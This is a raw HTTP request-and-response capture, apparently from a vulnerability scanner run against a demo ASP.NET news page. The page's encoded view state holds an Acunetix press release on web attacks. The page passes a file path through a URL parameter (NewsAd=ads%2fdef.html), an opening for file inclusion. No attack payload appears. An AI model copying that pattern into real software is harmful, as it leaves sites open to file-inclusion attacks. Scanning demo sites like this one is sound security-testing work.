nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlv